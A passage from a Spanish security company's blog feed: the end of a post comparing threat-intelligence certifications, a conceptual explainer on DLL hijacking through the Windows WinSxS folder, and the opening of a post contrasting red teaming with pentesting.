solicitado por un cliente real.</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmkagsFMH4_CpK-I5pYo3CEfNDNqu0gbDrSElin1mhw0_6A-_m4UztlO0bYxmJmag4sb2mCsrWH9nUAXmetu5G3qJEOAnnH7lm7uSxyJbOnr16bPTE6cY-qZ1Y9pn-UVdcHfiFJ0VwJMKopsxkvIiKTz0PkPE-Ie2wpAVBBlVzA9Rc_KQhFSAMLx412O_I/s383/GIAC%20Open%20Source%20Intelligence%20Gosi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="383" data-original-width="383" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmkagsFMH4_CpK-I5pYo3CEfNDNqu0gbDrSElin1mhw0_6A-_m4UztlO0bYxmJmag4sb2mCsrWH9nUAXmetu5G3qJEOAnnH7lm7uSxyJbOnr16bPTE6cY-qZ1Y9pn-UVdcHfiFJ0VwJMKopsxkvIiKTz0PkPE-Ie2wpAVBBlVzA9Rc_KQhFSAMLx412O_I/w200-h200/GIAC%20Open%20Source%20Intelligence%20Gosi.png" width="200" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.giac.org/certifications/open-source-intelligence-gosi/">GIAC Open Source Intelligence Certification (GOSI), GIAC</a></span></h4><div><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Nivel: Avanzado</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Precio: 979$</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Renovación: Cada 2 años, 479$</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Las certificaciones de GIAC tienen asociados training de SANS, en este caso el SEC487. El curso de SANS se conforma sobre los conocimientos requeridos en el examen de la certificación, por lo que puede ser recomendable su realización. El examen de certificación consta de 75 preguntas y para su aprobación un 69% al menos.</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><br /></div><div><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Certificaciones relativas a actores y amenazas cibernéticas, CTI (Cyber Threat Intelligence)</span></h3><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL-0a9dEEzae7LL-pqhzt1EayetNLHLl1gq69LCmwnI4yq1SdrbMEyugrq96Hbh_gjJq04m0CGDv8iFFZrRcxCK0-KgKx2oym6fFeAGXoooNOGqnz3L_C77-We81fdQW5ihvTwUxBHS85Zw4Q6z1V45sWLcBLQLJSFIZn7DXJ3kbsibze8rsDMpuciNJaJ/s168/Crest.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="168" data-original-width="167" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL-0a9dEEzae7LL-pqhzt1EayetNLHLl1gq69LCmwnI4yq1SdrbMEyugrq96Hbh_gjJq04m0CGDv8iFFZrRcxCK0-KgKx2oym6fFeAGXoooNOGqnz3L_C77-We81fdQW5ihvTwUxBHS85Zw4Q6z1V45sWLcBLQLJSFIZn7DXJ3kbsibze8rsDMpuciNJaJ/s1600/Crest.png" width="167" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.crest-approved.org/skills-certifications-careers/crest-practitioner-threat-intelligence-analyst/">Practitioner Threat Intelligence Analyst (CPTIA), CREST</a></span></h4><div><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Nivel: Principiante</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Precio: £399</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Renovación: Cada 3 años</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El examen de certificación de CREST es extenso con un total de 120 preguntas con múltiple respuesta con un mínimo del 70% de aciertos para su aprobación (84 preguntas correctas). En él se evalúa el conocimiento sobre la recopilación y el análisis de información para la generación de inteligencia de amenazas, así como las habilidades y conocimientos básicas y áreas más específicas relacionas con los roles existentes. El precio de la certificación varía según el país, ya que el training necesario para acceder se ofrece por dos organizaciones distintas.</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWrBpv2IrMSliL0d-edQacE16HWq7Uz9GJiCZalzBnFtqTp08ibmFIhq2iUPmqTJx6-JrsapayqZsrIpPqyC9ibrqWLxPcHqAdXKzXTIw1LzV7O3hgIoAFqGy8LI9XwwxqaTB670gPKAwNIY0wwEKutTNCjryYgYGljSMxSvO8_wnJdeY8AvjvR563dw79/s150/CTIA%20Certified%20Threat%20Intelligence%20Analyst.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="150" data-original-width="146" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWrBpv2IrMSliL0d-edQacE16HWq7Uz9GJiCZalzBnFtqTp08ibmFIhq2iUPmqTJx6-JrsapayqZsrIpPqyC9ibrqWLxPcHqAdXKzXTIw1LzV7O3hgIoAFqGy8LI9XwwxqaTB670gPKAwNIY0wwEKutTNCjryYgYGljSMxSvO8_wnJdeY8AvjvR563dw79/w195-h200/CTIA%20Certified%20Threat%20Intelligence%20Analyst.png" width="195" /></span></a></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.eccouncil.org/train-certify/certified-threat-intelligence-analyst-ctia/">Certified Threat Intelligence Analyst (C|TIA), EC-Council</a></span></h4><div><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Nivel: Intermedio</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Precio: 450$</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Renovación: No requiere</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Es posible acceder a la certificación realizando alguno de los trainings asociados a esta o bien acreditando experiencia profesional en el ámbito de la ciberseguridad, en cuyo caso habrá que abonar el precio de la solicitud de elegibilidad. El examen de certificación consta de 50 preguntas y para su aprobación requiere un mínimo del 70%. </span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ragDDq0_4m3Z-ewINR0gvs2cTLadTYM_juWcOPOc4XLfj-tGGYebMSSSy56xSA8Ck2AQdpVHnnlH4A1WVNJqA3Mgk84zy24jjdZ9BDmhMUCNj8ygLQKcGW3owJtQWOKM2T5aycKWlZyaLqh8MsvsAff0S1mqVXL50ov48ORFKeewthKkTLIVLT9j1f3X/s163/GIAC%20Cyber%20threat%20intelligence%20GCTI.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="162" data-original-width="163" height="199" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1ragDDq0_4m3Z-ewINR0gvs2cTLadTYM_juWcOPOc4XLfj-tGGYebMSSSy56xSA8Ck2AQdpVHnnlH4A1WVNJqA3Mgk84zy24jjdZ9BDmhMUCNj8ygLQKcGW3owJtQWOKM2T5aycKWlZyaLqh8MsvsAff0S1mqVXL50ov48ORFKeewthKkTLIVLT9j1f3X/w200-h199/GIAC%20Cyber%20threat%20intelligence%20GCTI.png" width="200" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.giac.org/certifications/cyber-threat-intelligence-gcti/">GIAC Cyber Threat Intelligence (GCTI), GIAC</a></span></h4><div><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Nivel: Avanzado</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Precio: 979$</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Renovación: 479$</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Las certificaciones de GIAC tienen asociados training de SANS, en este caso el FOR578. El curso de SANS se conforma sobre los conocimientos requeridos en el examen de la certificación, por lo que puede ser recomendable su realización. El examen de certificación contiene de 75 a 82 preguntas y para su aprobación requiere un mínimo de 71%.</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ4WksIAxTi-CErcfiF9Rbq0brxgruMLq7aK2KyJavD7bMQ3kaFhgzsuzdg6ba8AN36w4Q1pH1d_A-RA72y6ZS5ROYb72bptgxb7g68A6wPlS8aiVqOvtP4RJZJhKEKBg-j4YiXvHP5LVHBpeldlFaGB80nl41FcQwUAdZE_sgJK7EtY21jwH9814IO2bI/s409/OSINT%20Expert%20Certified.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="388" data-original-width="409" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJ4WksIAxTi-CErcfiF9Rbq0brxgruMLq7aK2KyJavD7bMQ3kaFhgzsuzdg6ba8AN36w4Q1pH1d_A-RA72y6ZS5ROYb72bptgxb7g68A6wPlS8aiVqOvtP4RJZJhKEKBg-j4YiXvHP5LVHBpeldlFaGB80nl41FcQwUAdZE_sgJK7EtY21jwH9814IO2bI/w200-h190/OSINT%20Expert%20Certified.png" width="200" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.mosse-institute.com/certifications/mtia-certified-threat-intelligence-analyst.html">Certified Threat Intelligence Analyst (MTIA), Mossé Cyber Security Institute </a></span></h4><div><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Nivel: Avanzado</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Precio: 450$</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Renovación: No requiere</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La obtención de la certificación se realiza completando el 100% de los ejercicios que se presentan en los módulos. Estos módulos prácticos están separados por temáticas relacionadas con los fundamentos básicos, análisis de malware y contramedidas entre otros. No cuenta con límite de tiempo para su realización.</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQwDGlD-hvrN8TwwfOrn-csxfJUbjqLi3Ds5CptzU0xhmjcp_UI0kvwLegJ0NuHT4spmwB5MoCUNZdHcsLhXMGElc1_NkuZKekkv-WrKJjOazuTailKXtpsOlCJwcRH0S4wmajl_jsNOmNd8kbEo7fR7Xjzuqe-ttGn2413zxOSKIlYuFOH9CzQZSeE0cf/s351/Cyber%20Threat%20intelligence%20certification%20Mitre%20Att%20CK.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="350" data-original-width="351" height="199" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQwDGlD-hvrN8TwwfOrn-csxfJUbjqLi3Ds5CptzU0xhmjcp_UI0kvwLegJ0NuHT4spmwB5MoCUNZdHcsLhXMGElc1_NkuZKekkv-WrKJjOazuTailKXtpsOlCJwcRH0S4wmajl_jsNOmNd8kbEo7fR7Xjzuqe-ttGn2413zxOSKIlYuFOH9CzQZSeE0cf/w200-h199/Cyber%20Threat%20intelligence%20certification%20Mitre%20Att%20CK.png" width="200" /></span></a></div><h4 style="clear: both; text-align: center;"><div style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";"><br /></span></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><a href="https://mad-certified.mitre-engenuity.org/group/283476">ATT&CK® Cyber Threat Intelligence Certification (CTI), MITRE ATT&CK®</a></div></span></h4><div><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Nivel: Avanzado</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Precio: 499$ por año</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Renovación: No requiere</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Esta certificación, como las demás ofrecidas por MITRE ATT&CK® desde el 1 de enero de 2024 se ofrecen exclusivamente en la plataforma MAD20™. Para su obtención, se requiere la suscripción anual y la aprobación de una serie de insignias propias del itinerario de la certificación a la que se opta. Una vez obtenidas todas las insignias necesarias, es posible acceder al examen final y con su aprobación conseguir la certificación. La suscripción tiene incluidas training online y asistencia a eventos.</span></div><div style="text-align: justify;"><br /></div><div><br /></div><div style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/noeliab/">Noelia B.</a>, <i>Analista de Inteligencia </i>en <a href="http://www.zerolynx.com">Zerolynx</a>.</span></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0tag:blogger.com,1999:blog-7938680518783212855.post-7104101338587725532024-01-22T09:00:00.004+01:002024-01-22T12:45:58.041+01:00DLL Hijacking y WinSxS<p style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm8mvnN2wvDpi3YBUWlrbZvsd3aJgwA5j_8-7rAWck5sBku1iFUsgUd3ztyQidN2WUKBSc4TkJUwTS5dP82eO08jzVpS1-CBhPKfh0iCNzE2OaOME8JwovCNYnsp6gcn70FBd1MfX6pCqP74LO0Bto2T8genG4bTlHTanUQJSx6aWo-SVYN6Msqlc3Ee2O/s1920/DLL%20Hijacking%20y%20WinSxS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm8mvnN2wvDpi3YBUWlrbZvsd3aJgwA5j_8-7rAWck5sBku1iFUsgUd3ztyQidN2WUKBSc4TkJUwTS5dP82eO08jzVpS1-CBhPKfh0iCNzE2OaOME8JwovCNYnsp6gcn70FBd1MfX6pCqP74LO0Bto2T8genG4bTlHTanUQJSx6aWo-SVYN6Msqlc3Ee2O/w640-h360/DLL%20Hijacking%20y%20WinSxS.png" width="640" /></a></div><br /><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En el año 2023, según un estudio publicado por Qualys, se registraron un total de 26,447 vulnerabilidades, mercando un hito como el año con la mayor cantidad de vulnerabilidades publicadas en la historia. Con el objetivo de comenzar el 2024 con una conciencia renovada sobre la importancia de la seguridad cibernética, es crucial estar al tanto de las nuevas amenazas que han surgido.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">A pesar de que el secuestro de DLL es una vulnerabilidad de larga data, un reciente estudio de <a href="https://www.securityjoes.com/post/hide-and-seek-in-windows-closet-unmasking-the-winsxs-hijacking-hideout">SecurityJoes</a> ha identificado una nueva variación de esta técnica. Esta variante aprovecha los binarios presentes en la Carpeta WinSxS, lo que amplía las posibilidades para potenciales atacantes.</span></p><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Carpeta WinSxS:</span></h4><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La carpeta WinSxS es un componente crítico del sistema, ya que es donde Windows almacena los archivos de las actualizaciones que se instalan, las copias de seguridad y puntos de restauración que el equipo genera automáticamente cada vez que se instala una nueva aplicación. Es por eso que el contenido de esta carpeta suele aumentar con el tiempo, ampliando así la superficie de ataque. Suele estar localizado en el directorio “C:\Windows\WinSxS”.</span></p><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Bibliotecas de Vínculos Dinámicos (DLL):</span></h4><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Las DLLs son archivos que contiene código ejecutable y partes de software que se pueden usar por diferentes aplicaciones al mismo tiempo. Estos archivos, en el ecosistema de Windows, permiten la reutilización de funciones y recursos por diferentes programas sin necesidad de replicar el código, lo que optimiza el uso de memoria y facilita el desarrollo de software.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El secuestro de DLL capitaliza el método natural por el cual los programas de Windows buscan y acceden a las Bibliotecas de Vínculos Dinámicos (DLL). Este proceso sigue un orden específico para localizar las DLLs requeridas:</span></p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px; text-align: left;"><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">1. </span><span style="font-family: "Barlow Semi Condensed";">El directorio desde donde se ejecuta la aplicación</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">2. </span><span style="font-family: "Barlow Semi Condensed";">La carpeta C: Windows Syste m32</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">3. </span><span style="font-family: "Barlow Semi Condensed";">La carpeta C: Windows Syste m</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">4. </span><span style="font-family: "Barlow Semi Condensed";">La carpeta C: Windows</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">5. </span><span style="font-family: "Barlow Semi Condensed";">El directorio de trabajo actual</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">6. </span><span style="font-family: "Barlow Semi Condensed";">Directorios listados en la variable de entorno PATH del sistema.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">7. </span><span style="font-family: "Barlow Semi Condensed";">Directorios listados en la variable de entorno PATH del usuario.</span></p></blockquote><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cuando un atacante logra cargar una DLL maliciosa con el mismo nombre que una biblioteca dinámica legítima y esta versión maliciosa se encuentra antes en la secuencia de búsqueda que la versión auténtica, la aplicación carga la DLL maliciosa. Esto puede conducir a la ejecución de código arbitrario, lo que permite al atacante realizar acciones como el establecimiento de un "reverse shell", proporcionándole acceso remoto no autorizado al sistema comprometido. Windows, en su configuración por defecto, no realiza una verificación de autenticidad de las DLLs antes de cargarlas.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Comparado con los métodos tradicionales que implican subir un archivo ejecutable malicioso, en este caso se aprovechan varios ejecutables maliciosos presentes en la carpeta WinSxS para el secuestro de DLL. Esta técnica evita la escalada del privilegio para poder inyectar código malicioso, ya que se utilizan recursos legítimos del sistema. una ventaja adicional de este nuevo enfoque es que es más susceptible de pasar desapercibida por antivirus del sistema y que salten alerta sobre ello, ya que se emplean ejecutables legítimos del sistema para llevar a cabo acciones maliciosas, lo que reduce la posibilidad de detección al generar menos actividad sospechosa.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></p><p style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmwdCvLSLYM3gybaEaIgYXgHENYDP895m-mzIlk2E6FJyQBxi0Zkj98b8IZwomDwNgaOzGcpKeEa6_ebkIaKhTCfPNT08Y6YtUSZjHKpI6v-Y1DhsIIZ7A2l-fVd6duzLoiApEC6NOmpLgrSm95O2Xt6yXZFD1t1gl_I-eSj-Xz5LPKrUKQXgpbZLEC2J7/s1538/execution%20flow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1125" data-original-width="1538" height="468" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmwdCvLSLYM3gybaEaIgYXgHENYDP895m-mzIlk2E6FJyQBxi0Zkj98b8IZwomDwNgaOzGcpKeEa6_ebkIaKhTCfPNT08Y6YtUSZjHKpI6v-Y1DhsIIZ7A2l-fVd6duzLoiApEC6NOmpLgrSm95O2Xt6yXZFD1t1gl_I-eSj-Xz5LPKrUKQXgpbZLEC2J7/w640-h468/execution%20flow.png" width="640" /></a></div><br /><span style="font-family: Barlow Semi Condensed;"><br /></span><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Si os ha parecido un tema interesante os dejamos un enlace sobre <a href="https://www.flu-project.com/2023/11/ComoEvadirAMSIconDLL.html">cómo evadir AMSI haciendo uso de DLL Hijacking </a>y por si queréis repasar <a href="https://www.flu-project.com/2018/01/dll-hijacking-aprendiendo-los-conceptos.html">conceptos básicos sobre DLL Hijacking</a> también podéis hacerlo.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></p><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><blockquote style="border: none; margin: 0 0 0 40px; padding: 0px;"><p style="text-align: justify;"><a href="https://www.linkedin.com/in/xuqiang-liu-xu-5456b9265/" style="background-color: white; box-sizing: border-box; color: #1e71b8; cursor: pointer; font-family: "Barlow Semi Condensed"; font-size: 16px; outline: none; text-align: right; text-decoration-line: none; transition: all 0.5s ease 0s;">Xuquiang Liu Xu</a><span style="background-color: white; color: #212529; font-family: "Barlow Semi Condensed"; font-size: 16px; text-align: right;">, Pentester Jr. at <a href="http://www.zerolynx.com">Zerolynx</a>.</span></p></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote></blockquote><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></p>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-45981817673744953512024-01-15T09:00:00.032+01:002024-01-17T14:41:11.727+01:00Red Team 2.0<p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></p><p style="text-align: justify;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-kS982RVLOz4KLxzcBk37U7x9_VKhIV5Xd4EdDJFvVWLAME-CX9cN40ZVwxjDcvydfeRCVu488rtBwMfSdcxDeQQnO9R6K-I85Q-gEHAKWzJQ6-nyVEwDbBkTg_Y_3fcXoFeu1Q50AIrLVVNYghB2PVwyGS57XAsEs1descTjxcWE78Hdx0iruNYYOJIr/s1920/Red%20Team%20Persistente.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-kS982RVLOz4KLxzcBk37U7x9_VKhIV5Xd4EdDJFvVWLAME-CX9cN40ZVwxjDcvydfeRCVu488rtBwMfSdcxDeQQnO9R6K-I85Q-gEHAKWzJQ6-nyVEwDbBkTg_Y_3fcXoFeu1Q50AIrLVVNYghB2PVwyGS57XAsEs1descTjxcWE78Hdx0iruNYYOJIr/w640-h360/Red%20Team%20Persistente.jpg" width="640" /></a></div><span style="font-family: Barlow Semi Condensed;"><br /></span><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Muchos habréis oído hablar de este concepto que lleva años emplazado en el sector de la ciberseguridad, pero seguramente no todos sabéis de qué se trata o en qué consiste realmente un red team y sobre todo, qué diferencia hay con una auditoría de hacking ético también conocida como pentesting o prueba de penetración.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">No os preocupéis, en este articulo os vamos a detallar en qué consiste un red team, qué ventajas ofrece, por qué todas las empresas deberían contar con este servicio y qué propuesta disruptiva propone Zerolynx con su nuevo concepto de Red Team 2.0 (Red Team Persistente).</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Pero antes empecemos explicando que es un red team tradicional. Un red team es un ejercicio de ciberseguridad que tiene como objetivo retar a una organización mediante la realización de ataques para evaluar sus debilidades y mejorar su resiliencia. En este ejercicio intervienen dos equipos:</span></p><p style="text-align: justify;"></p><ul><li><span style="font-family: Barlow Semi Condensed;"><b><u>Red team:</u></b> equipo atacante encargado de ejecutar y poner en práctica las técnicas de ataques reales empleadas por actores maliciosos. Tendrán que poner mucho esfuerzo en no ser detectados al igual que en no afectar a la operatividad de la organización en el transcurso de las pruebas.</span></li></ul><ul><li><span style="font-family: Barlow Semi Condensed;"><b><u>Blue team:</u></b> equipo defensor encargado de detectar y responder a los ataques llevados a cabo por el red team. Carece de información sobre quién, cuándo, y cómo se realizarán los ataques planificados por el red team, de esta forma se pretende emular un ataque lo más realista posible.</span></li></ul><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Existen dos equipos más no tan protagonistas, pero que también colaboran y participan en el ejercicio:</span></p><p style="text-align: justify;"></p><ul><li><span style="font-family: "Barlow Semi Condensed";"><b><u>White Team:</u></b> coordinador del ejercicio por parte de la organización. Es quien normalmente solicita el servicio de red team en la compañía y, por tanto, actúa de interlocutor con este. Vela por que todo el ejercicio se lleve a cabo tal y como estaba previsto y se logre el objetivo perseguido. </span></li></ul><ul><li><span style="font-family: "Barlow Semi Condensed";"><b><u>Purple team:</u></b> se conforma una vez concluidas las acciones del red team. Habitualmente lo conforman miembros del red team y del blue team, quienes analizan lo ocurrido y elaboran planes de mejora.</span></li></ul><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Llegados a este punto, ¿Qué diferencias existen entre una auditoría de hacking (Pentesting) y un ejercicio de red team?</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La principal diferencia es el alcance y el enfoque de ambos ejercicios. </span></p><p style="text-align: justify;"></p><ul><li><span style="font-family: Barlow Semi Condensed;">Por un lado, el <b>Red team</b> es mucho más amplio, y está centrado en llevar a cabo una <b>simulación de ataque completa </b>de toda la organización, sin ningún tipo de información preconcebida, y actuando de la forma <b>más realista </b>posible, como lo haría un atacante, cuidando en todo momento no ser detectado, al tiempo que el equipo de blue team tiene que lograr ser<b> capaz de detectar</b> toda y cada una de las acciones llevadas a cabo por el equipo atacante, así como saber responder a cada una de ellas.</span></li></ul><ul><li><span style="font-family: "Barlow Semi Condensed";">Por otro lado, el <b>Pentesting</b> tiene un alcance más acotado y específico, el cual se centra en la <b>identificación y explotación de vulnerabilidades </b>de uno o varios activos concretos, partiendo en muchos casos de cierta información privilegiada proporcionada por la organización. El objetivo principal en este caso no es evaluar la capacidad de detección y respuesta de la organización, si no <b>identificar fallos de seguridad</b>, vulnerabilidades técnicas, configuraciones inseguras, etc. en los activos propuestos.</span></li></ul><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Ambos enfoques son valiosos y se pueden adaptar según los objetivos y las necesidades específicas de seguridad de la organización. A continuación, os dejamos un resumen con las características de cada uno:</span></p><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijXNOhUhp1O4QgNH0sJnWxfoy4ZfU-A1rGSW4Pxf1ejP5SJ8aF5YXAz2ufBXPOWzvk4uIMy_WxbUkoBSAg5_CRsZwqtDiMJN6fU7g5382q4IQRZrNb8qr_Jf4PyfeuJePxxyOn0lxlc78fkJcuw5wtlRUaExXpEjUO6tzRTrPwURElEwUYk6952zT0ff7C/s709/Imagen1.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="568" data-original-width="709" height="512" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijXNOhUhp1O4QgNH0sJnWxfoy4ZfU-A1rGSW4Pxf1ejP5SJ8aF5YXAz2ufBXPOWzvk4uIMy_WxbUkoBSAg5_CRsZwqtDiMJN6fU7g5382q4IQRZrNb8qr_Jf4PyfeuJePxxyOn0lxlc78fkJcuw5wtlRUaExXpEjUO6tzRTrPwURElEwUYk6952zT0ff7C/w640-h512/Imagen1.png" width="640" /></span></a></div><span style="font-family: Barlow Semi Condensed;"><div style="text-align: justify;"><br /></div></span><div style="text-align: justify;"><span style="font-family: Barlow Semi 